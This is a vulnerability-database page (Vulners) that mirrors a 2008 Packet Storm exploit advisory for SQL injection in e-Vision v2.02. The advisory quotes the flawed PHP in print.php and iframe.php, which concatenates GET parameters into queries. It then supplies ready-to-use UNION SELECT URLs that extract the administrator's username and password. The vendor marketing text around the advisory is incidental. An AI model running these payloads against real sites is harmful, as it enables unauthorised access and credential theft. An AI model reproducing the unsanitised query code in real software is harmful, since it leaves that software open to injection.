Lucene search
K

evision-sql.txt

🗓️ 25 Feb 2008 00:00:00Reported by Cod3rZType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

e-Vision v2.02 Multiple Remote SQL Injection on print.php and iframe.ph

Code
`  
---------------------------------------------------------------------------------------------------------------------------  
_ ____ _ _ _ _   
__ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _  
/ _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || |  
\__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|  
---------------------------------------------------------------------------------------------------------------------------  
e-Vision v2.02 Multiple Remote SQL Injection   
---------------------------------------------------------------------------------------------------------------------------  
Author: Cod3rZ  
Site: http://cod3rz.helloweb.eu  
---------------------------------------------------------------------------------------------------------------------------  
PoC: (print.php)  
---------------------------------------------------------------------------------------------------------------------------  
$idcontent = $_GET['id'];  
$sql = "SELECT `idcontainer` FROM `content` WHERE `idcontent`='".$idcontent."'";  
$res = mysql_query($sql);  
$row = mysql_fetch_array($res);  
---------------------------------------------------------------------------------------------------------------------------  
nickname: print.php?id='+union+select+username+from+users+where+idusers=1/*  
password: print.php?id='+union+select+pass+from+users+where+idusers=1/*  
---------------------------------------------------------------------------------------------------------------------------  
PoC: (iframe.php)  
---------------------------------------------------------------------------------------------------------------------------  
$sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";  
$result = mysql_query($sql);  
$row = mysql_fetch_array($result);  
---------------------------------------------------------------------------------------------------------------------------  
nickname: iframe.php?field=idcontainer&module=content&id='+union+select+username+from+users+where+idusers=1/*  
password: iframe.php?field=idcontainer&module=content&id='+union+select+pass+from+users+where+idusers=1/*  
---------------------------------------------------------------------------------------------------------------------------  
  
That's All  
Bye, Cod3rZ  
_________________________________________________________________  
Scarica GRATIS le tue emoticon preferite!  
http://intrattenimento.it.msn.com/emoticon/`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4
43